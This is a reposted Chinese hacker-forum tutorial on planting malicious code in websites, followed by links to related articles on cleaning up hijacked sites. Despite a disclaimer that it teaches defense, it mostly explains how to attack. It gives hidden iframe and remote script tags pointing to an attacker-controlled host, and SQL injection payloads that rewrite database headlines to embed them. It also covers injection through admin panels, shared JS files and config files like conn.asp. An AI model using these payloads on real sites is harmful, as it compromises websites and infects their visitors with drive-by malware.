[转载]多姿多彩的网站挂马方式

简介:
信息来源:黑客基地

--------------------------------------------------------------------------
先说明一点,不是怎么教大家挂马,是让你学会挂马,怎么防守,怎么找马,怎么找关键字,怎么让你学会别人是通过什么方法挂到你的网站上的..
有利就有弊,随便怎么看吧。
--------------------------------------------------------------------------

这里我拿挂首页index.asp来举例子。

先说一说,得到webshell的挂马方法
一般的挂马的都是用框架,这是最基本的挂马方式,只要不破坏原有的语言逻辑,那就想插入哪里就写哪里了,最基本的语句当然是<iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>,其中
[url]http://www.fucksb.net/mm.htm[/url] 是我们的木马,下面就不一个一个提示了。
  
上面可能是一般的挂马方式,也是初学者的玩法,好了,再说深一点点的,那就是js文件,好多网站上,你查看源代码都会调用js文件,其中的语句为<script language=javascript src=./ad/ad.js></script>,想到了什么,这里也可以挂马,其中我们可以远程调用自己的js,比如:<script language=javascript src=http://www.fucksb.net/mm.js></script>这个mm.js就可以写木马了,怎么写呢,同样,我们还用最基本的iframe框架,不过在<script></script>之中可识别语言不是html,那怎么办呢,follow me,js文件可以这样写:document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>");,这种形势,这时就可以执行此js中的代码了,当然了,说白了,其实全语句就是<script language=javascript>document.write("<iframe <iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>")</script>呵呵。。

聪明的你可能发现了一点,好像不止是js文件哦~,只要在<script></script>之中,无论什么后缀的文件,只要里面写的语句可以被javascript识别就会执行,对的,比如<script src=http://www.fucksb.net/mm.test></script>,又如<script src=http://www.fucksb.net/mm.lala></script>管他的后缀是什么,只要里面写的语句正确就会被执行了。

  同样,如果首页调用其它网站,或者次级目录中的htm,asp等如:<iframe src=./ad/news.htm width=300 height=200></iframe>
也可以在news.htm文件里挂马,可以是htm和js,随便哪种,这是比较隐蔽的玩法,这些适用于主页没有写权限的方法。

<script>同<iframe>2个相比较,好处是script整体挂马的代码长度比iframe小得多,很实用。说实用是在数据库方面,下面介绍。

    数据库挂马,这里我们拿mssql数据库为例子。

这里说的是首页调用到的数据库,比如新闻,论坛,公告,等等,一般是标题。这些需要经验去检测,举个例子,比如首页有一条新闻为:“明日开业”,那么鼠标点此新闻,地址栏打开的新窗口为news.asp?id=1,这种情况,这时,就可以判断此新闻是从数据库中调用的了,当然了,我们不说access,只说mssql。
首页,我们要有这个网站中的一个注入点,比如就点在vote.asp?id=123,同时,至少是Db_owner权限,这时如果要挂马可以不用取到webshell,因为如果我们的目的只在于挂马的话,而且有时,还得检测mssql数据库和web服务器不在同一个机器上,那挂马的方式就是更改数据库内容,这里我说的就是这种,如上面说的,首页显示的一条新闻标题为“明日开业”,如果首页显示的标题是“明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>”,那这样的话,首页就会执行这段代码了,像这种情况,找到了注入点,就得找表名,如此新闻的表名为news,字段为title,id,等等,根据猜测,id=1时,暴出的字段title的值就为“明日开业”,那么90%就可以猜到了,首页调用的数据库的字段就为news表中的title,这时在注入点,可以大胆提交vote.asp?id=123;update news set title='明日开业</a><iframe src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1;--,这样就可以更改数据库了,前提是最少要少db_owner权限,当然也有时由于代码原因,也可以这样提交:vote.asp?id=123';update news set title='明日开业</a><ifrmae src=http://www.fucksb.net/mm.htm width=0 height=0></iframe>' where id=1 and '1'='1,也可以...
这种方法是有问题的,实战中存在不少问题,因为一般的情况下,标题都是通过<table>来限制宽度,也就是说如果你的标题的长度超过了指定的长度,那么你的代码只能写一半,这样就不能执行了,所以挂马最好的方法是用<script>这种方法来挂马了,如:
vote.asp?id=123;update news set title='明日开业</a><script src=http://www.fucksb.net/mm.js></script>' where id=1;--长度有很大的减少,很不错。
  
  后台挂马
  通常注入等不到webshell,就只能靠进后台挂马。

  这里说的是进入了后台,但不能通过后台得到webshell,这时要仔细关察后台,像比较网站的链接、顶部底部的广告、都可以直接写入你的木马代码,等等,后台是灵活的,具体问题具体分析。不过有一点很重要,是不要打乱前台htm源文件里的代码逻辑,比如应该闭合前面的<a><img>"( 等这些符号,应该先闭合掉如</a></img>")。

  其它形式

  如一首页调用了<iframe src="http://blog.77169.com/vote.asp?id=1&";no=view width=100></iframe>此种形势,一样可以在vote.asp中直接写入iframe木马代码,如果调用的是<script src="http://blog.77169.com/vote.asp?id=1&";no=view width=100></script>在vote.asp写代码时,请用document.write("")这种格式写入,当然,如果被挂文件中还有调用的文件可以继续往深处写,如果你够狠的话,直接写到数据库配置文件中,如conn.asp,这样好多页面可以同时挂上你的一种木马了。
  当然这里也有js文件,一样原理。
  挂一个网站的马,不一定就得攻入他,有时没有方法的同时,可以考虑跨站。好多站用了别的站的js文件,如:<script src=http://www.163.com/user.js>这种情势,这时就可以考虑只拿163.com的权限就行了,只要能修改到user.js文件就可以挂到你要挂的站点了,同理,也有<iframe src=http://www.163.com/user.htm>此种情况,一样道理,剑走偏锋,达到目的,无论用什么招数了。
  
  服务器挂马
  这里简单说一个比较狠的吧.

  重定向任何调用的htm,js,等文件.













本文转自loveme2351CTO博客,原文链接: http://blog.51cto.com/loveme23/8534,如需转载请自行联系原作者



相关文章
|
云安全 域名解析 安全
网站被攻击有什么办法呢?
网站为什么会遭遇DDoS攻击?德迅云安全SCDN如何有效防御DDoS攻击?
|
Web App开发 安全 JavaScript
WordPress建站之如何从恶意重定向恶意软件黑客攻击中恢复
关于WordPress建站的问题,欢迎留言讨论,关注“六翼开源”专注WordPress建站服务。
WordPress建站之如何从恶意重定向恶意软件黑客攻击中恢复
|
缓存 前端开发 JavaScript
网站被劫持跳转的症状与木马清理
先来看一下这个症状是什么样的,这里我找到了一个客户网站的案例,那么当我在通过百度搜索某些关键词的时候,当我点击这个链接的时候,它会给你跳到这种菠菜的页面,那么怎么样判断它是前端还是后端PHP进行了一个劫持,那么我们就把这个链接复制过来,复制好了后,我打开这个调试面板,然后在这里有一个 settings的这个一个设置按钮,把这个disable javascript这个脚本把它禁用,那么禁用之后把刚才这复制过来的这个快照链接把它复制过来,然后敲一下回车,就会发现发现它是不会跳转的,所以对于这一种请求跳转,我们把它称之为叫做前端拦截。要知道前一两年这种形式还是比较少的,但是今年发现的就越来越多,原
884 0
网站被劫持跳转的症状与木马清理
|
安全 搜索推荐
网站快照收录被黑客攻击劫持跳转
我们普通用户一般很难发现,今天有一个客户咨询我,说为什么他的一个网站的信息显示在一个菠菜网站上?我说这是人家利用了你的网站数据后被搜索引擎收录而留下的一个快照,快照是你的信息,打开却是违法信息,还有一种情况是快照是非法信息,而打开却是正常的网站信息,这种情况一般是网站被挂马或者域名遭到了劫持,在你 site搜索某个网站域名的时候,发现标题描述关键词全部被改掉了,点击以后会进入一个非法的网站页面,它替换掉了你被搜索引擎收录的快照信息并做了跳转,如果你自己在浏览器地址栏输入网址进去,并不会发现问题的所在,这种情况并不会直接破坏掉你网站的信息。
229 0
网站快照收录被黑客攻击劫持跳转
|
安全 JavaScript
网站安全防护之被恶意跳转博彩木马排查
访问站点只要后面目录带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转到博彩网站,如果是电脑PC浏览器,就会弹空白页访问站点,让你看不到跳转后的网址,只要域名后面地址带apk(不管是文件还是目录),就会判断请求头,如果为手机移动端的请求头,就会跳转bc网站,如果是电脑浏览器,就会弹空白页,最近也加上客户订单越来越少,领导也是着急,很大一部分客户渠道来源都从百度点击来的,静下心来看看网站到底是怎么回事,不看不要紧,简直吓我一跳。网站在百度里的收录增加许多,本来以为是更新的文章导致的,可是仔细一想也没那么多的收录呀,site:网站,点击到十页以后竟然发现了问题的关键
475 0
网站安全防护之被恶意跳转博彩木马排查
|
安全 前端开发 程序员
Discuz被攻击 首页篡改的漏洞修复解决办法
Discuz 3.4是目前discuz论坛的最新版本,也是继X3.2、X3.3来,最稳定的社区论坛系统。目前官方已经停止对老版本的补丁更新与升级,直接在X3.4上更新了,最近我们SINE安全在对其安全检测的时候,发现网站漏洞,该漏洞是由于用户登录论坛的时候调用的微信接口,导致可以进行任意登录,甚至可以登录到管理员的账号里去。
575 0
Discuz被攻击 首页篡改的漏洞修复解决办法
|
安全 数据安全/隐私保护
解决百度网址安全中心提醒您:该站点可能受到黑客攻击的网站安全
7月中旬发现客户网站被百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改!有的还会被提示 百度网址安全中心提醒您:该页面可能存在木马病毒!百度网址安全中心提醒您:该页面可能已被非法篡改!
786 0
解决百度网址安全中心提醒您:该站点可能受到黑客攻击的网站安全
|
SQL 缓存 安全
phpcms2008网站漏洞修复 远程代码写入缓存漏洞利用
SINE安全公司在对phpcms2008网站代码进行安全检测与审计的时候发现该phpcms存在远程代码写入缓存文件的一个SQL注入漏洞,该phpcms漏洞危害较大,可以导致网站被黑,以及服务器遭受黑客的攻击,关于这次发现的phpcms漏洞细节以及如何利用提权我们来详细剖析。
180 0
phpcms2008网站漏洞修复 远程代码写入缓存漏洞利用
|
SQL 缓存 监控
网站老是被劫持到其他网站怎么办
越来越多的网站被劫持,像跳转到彩piao网站,du博网站的情况时有发生,很多人可能都会经历过,电脑打开网站,以及手机打开移动端网站都会跳转到其他网站上去,这个就是网站被劫持跳转,那么网站被跳转的背后究竟是因为什么呢? 攻击者为何要劫持跳转到其他网站呢?SINE安全公司针对于这些安全情况,分析为什么网站首页会被篡改,会跳转,道高一尺魔高一丈,才能解决问题。
1164 0
网站老是被劫持到其他网站怎么办
|
SQL 缓存 安全
WordPress 站点地址被恶意篡改的防护方案讨论
关键词:WordPress,篡改,挂马,恶意,攻击,注入,跳转,重定向,网址,siteurl,home,url,hacked,jump,redirect 摘要:WordPress 站点稍有不慎就有可能受到恶意攻击。一种常见的手段是通过篡改站点的地址,用户访问网站时将会被重新定向到恶意网站。长老将分析两种常见的攻击手段:修改文件和修改数据库,并分享一些安全防护的小技巧。
692 0